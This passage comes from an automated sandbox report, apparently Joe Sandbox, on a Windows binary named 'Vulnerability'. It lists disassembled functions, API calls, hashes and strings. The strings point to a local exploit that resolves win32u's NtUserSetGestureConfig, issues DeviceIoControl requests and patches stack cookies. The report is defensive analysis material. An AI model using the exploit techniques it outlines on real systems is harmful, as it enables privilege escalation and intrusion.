                                                                                          • Instruction Fuzzy Hash: AC516B76B08B8189EB00EF60E4402AABBB1FB487ACF948036DE4D13759DE3CD249C354
                                                                                          Function 00007FF7CC41B6D0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 130libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 7f7072a78527782ad7cb3b54a6a444e447d352b78351a5178439e0cb6da2d73e
                                                                                          • Instruction ID: 43e043ddf88ee36c9081f4821c72d8048cc612a61100010004a1b722847de72c
                                                                                          • Opcode Fuzzy Hash: 7f7072a78527782ad7cb3b54a6a444e447d352b78351a5178439e0cb6da2d73e
                                                                                          • Instruction Fuzzy Hash: 75518E76B18B8199EB00EF60E4502A9BBB5FB4879CF949036DE4D17758DE3CD209C360
                                                                                          Function 00007FF7CC41AE50 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 129libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: f0f617d7adf2d206aa13789971f507a0a69f0b8330848dee14faf78aa38ec60c
                                                                                          • Instruction ID: d9cb3d686a33e456bd08a87c5f9beafc1dd13b4983bebf0516df03747c23df66
                                                                                          • Opcode Fuzzy Hash: f0f617d7adf2d206aa13789971f507a0a69f0b8330848dee14faf78aa38ec60c
                                                                                          • Instruction Fuzzy Hash: 69516D36B18B8199EB00EF60E4502A9BBB5FB487ACF948036DE4D17759DE3CD259C320
                                                                                          Function 00007FF7CC41BF40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 129libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7CC41BF8C
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7CC41BFB4
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7CC41BFED
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41C07B
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41C12F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: c93f71661edbf01c8d4ae4040cb6f1ce5bf552ffba1e795d2700228143497dab
                                                                                          • Instruction ID: 2ad26f48ea661619dab0e3c621bc04e38bbc6cc7aff8730c20e7dd16024786fc
                                                                                          • Opcode Fuzzy Hash: c93f71661edbf01c8d4ae4040cb6f1ce5bf552ffba1e795d2700228143497dab
                                                                                          • Instruction Fuzzy Hash: 9B517F72B18B8198EB00EF60E8502A9BBB5FB4879CF948036DD4D17755DE3CD219C724
                                                                                          Function 00007FF7CC41BB10 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 128libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 61943f61cf7b1be6646eabcb6d8571008b25b447d8ea4ca38e38a054b2f30144
                                                                                          • Instruction ID: 97c8037f0dc94d69441a9fb5c7227d2cbe45767e917202ac03f05428823bd23f
                                                                                          • Opcode Fuzzy Hash: 61943f61cf7b1be6646eabcb6d8571008b25b447d8ea4ca38e38a054b2f30144
                                                                                          • Instruction Fuzzy Hash: 06516072B18B8199E700DF60E4506A9BBB5BB487ACF948036DD8D13B19DE3CD219C760
                                                                                          Function 00007FF7CC41EC90 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 128libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: c095498fd2c6b1355e408e7f23fe90ed531437436c025c02fd8c0596c6b1ccae
                                                                                          • Instruction ID: d1ff98752669f3762a195d006508cfe1baff74d5ce557347e5ff772a9ef79847
                                                                                          • Opcode Fuzzy Hash: c095498fd2c6b1355e408e7f23fe90ed531437436c025c02fd8c0596c6b1ccae
                                                                                          • Instruction Fuzzy Hash: 1F516D36B18B8298EB10EF60E4446A9BBB5FB4879CF948036DE4D17759DE3CD219C350
                                                                                          Function 00007FF7CC41AA30 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 122libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AA6F
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AA97
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AAD1
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41AB5B
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41AC0D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 2cda43178b61f0acd55cd3896cf86487f5febb23219e759162b88f261f6b8468
                                                                                          • Instruction ID: 54d652fc43d3c4531823b0f541ce85e305ef356186b9e866b662f973ea38b5cf
                                                                                          • Opcode Fuzzy Hash: 2cda43178b61f0acd55cd3896cf86487f5febb23219e759162b88f261f6b8468
                                                                                          • Instruction Fuzzy Hash: A4515E72A18B8199E700DF20E8502A9BBB5FB487ACF948136DE8D17719DF3CD259C350
                                                                                          Function 00007FF7CC41E750 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E79D
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E7D6
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?good@ios_base@std@@U?$char_traits@_V01@@W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID: [+] Fixing stack cookie$[+] Load config directory wasn't found, probably StackCookie not defined, fix cookie skipped$[+] StackCookie not defined, fix cookie skipped$[-] StackCookie already fixed!? this probably wrong
                                                                                          • API String ID: 310790477-4185774449
                                                                                          • Opcode ID: 7594b96437ee2850946f2cd7182346ddda8625129cf03cdac55c4b0f2de49b66
                                                                                          • Instruction ID: aef06b07c66e9673f8a7f6ff3afca920880d05d8bb9dcad13f402cb8bbb908e1
                                                                                          • Opcode Fuzzy Hash: 7594b96437ee2850946f2cd7182346ddda8625129cf03cdac55c4b0f2de49b66
                                                                                          • Instruction Fuzzy Hash: 90317025F19BC281EA40FF15E895168AB61FF89BA8FC4A036D98E43715DF3CD295C720
                                                                                          Function 00007FF7CC421280 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC420B10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC420C0C
                                                                                          • _CxxThrowException.VCRUNTIME140 ref: 00007FF7CC4212D3
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC421330
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CC42133E
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7CC421311
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC421363
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@_W@std@@@std@@$V01@$??6?$basic_ostream@_$?good@ios_base@std@@D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@ExceptionOsfx@?$basic_ostream@_ThrowV01@@V12@V21@@Vios_base@1@_invalid_parameter_noinfo_noreturn
                                                                                          • String ID: by 0x$[!!] Crash$[!!] Crash at addr 0x$exists
                                                                                          • API String ID: 4130559589-3783130642
                                                                                          • Opcode ID: 080aeb56520599b7071670a4975e9314084b0c525a58dfc8b32ff2943dab44e4
                                                                                          • Instruction ID: e63d83a090d6d845d348095184d0a2636b54f3e9edadaf53f085a6f25a0e3acb
                                                                                          • Opcode Fuzzy Hash: 080aeb56520599b7071670a4975e9314084b0c525a58dfc8b32ff2943dab44e4
                                                                                          • Instruction Fuzzy Hash: FF218051E18AC681FA14FF15E8523B8AB21FF84BA8F84D031D94D43659EF2CE785C320
                                                                                          Function 00007FF7CC420C40 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __std_fs_code_page.MSVCPRT ref: 00007FF7CC420C9F
                                                                                            • Part of subcall function 00007FF7CC423948: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF7CC420CA4), ref: 00007FF7CC42394C
                                                                                            • Part of subcall function 00007FF7CC423948: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7CC420CA4), ref: 00007FF7CC42395B
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC420D6F
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC420E4F
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC420E5F
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC420EDD
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC420F2B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$memmove$ApisFile___lc_codepage_func__std_fs_code_page
                                                                                          • String ID: ", "$: "
                                                                                          • API String ID: 3155750461-747220369
                                                                                          • Opcode ID: fee7c37069f084fdb3fcbd432b07c9ad3f7f9eaf3580db1ef9395aa38425d06b
                                                                                          • Instruction ID: d61610523bbeb81b259dfa57d4fe990adc80b84d98d01d1b3ac414f135d38f2d
                                                                                          • Opcode Fuzzy Hash: fee7c37069f084fdb3fcbd432b07c9ad3f7f9eaf3580db1ef9395aa38425d06b
                                                                                          • Instruction Fuzzy Hash: D091AE72B04B8185EB14EF65E4413ACA7B2EB48BACF808531DE5E57B99DF38D291C350
                                                                                          Function 00007FF7CC41EEA0 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,?,00000000,?,00007FF7CC41EA7F,?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EF19
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EF39
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EF49
                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EF96
                                                                                          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EFBD
                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EFDE
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41F024
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41F02B
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41F038
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID:
                                                                                          • API String ID: 3858555242-0
                                                                                          • Opcode ID: 6bc19da90b3a22a95d9b41eedf678c2b399e3105eb9b11cf846f221ea2204440
                                                                                          • Instruction ID: 2de4af32cf2e89d6b26d9f6554cb882bd18adbe29b5b6cd7a5fc463f1459f959
                                                                                          • Opcode Fuzzy Hash: 6bc19da90b3a22a95d9b41eedf678c2b399e3105eb9b11cf846f221ea2204440
                                                                                          • Instruction Fuzzy Hash: BA515736608A8181EB209F19E594638EFA0FF85FA9B65C531DE9E437A1CF3DD5468310
                                                                                          Function 00007FF7CC41D3D0 Relevance: 13.6, APIs: 9, Instructions: 131COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D435
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D455
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D465
                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D4AC
                                                                                          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D4D9
                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D4FA
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D540
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D547
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D554
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID:
                                                                                          • API String ID: 3858555242-0
                                                                                          • Opcode ID: 3a3d278f9abfa924c7819ac86336879c49577fd7e6b5cdeb5568fe49040b45a1
                                                                                          • Instruction ID: 9daa4ab332125fc90052bd884a999afbf396c6d8e19bbe42f7438bdc7b5f902a
                                                                                          • Opcode Fuzzy Hash: 3a3d278f9abfa924c7819ac86336879c49577fd7e6b5cdeb5568fe49040b45a1
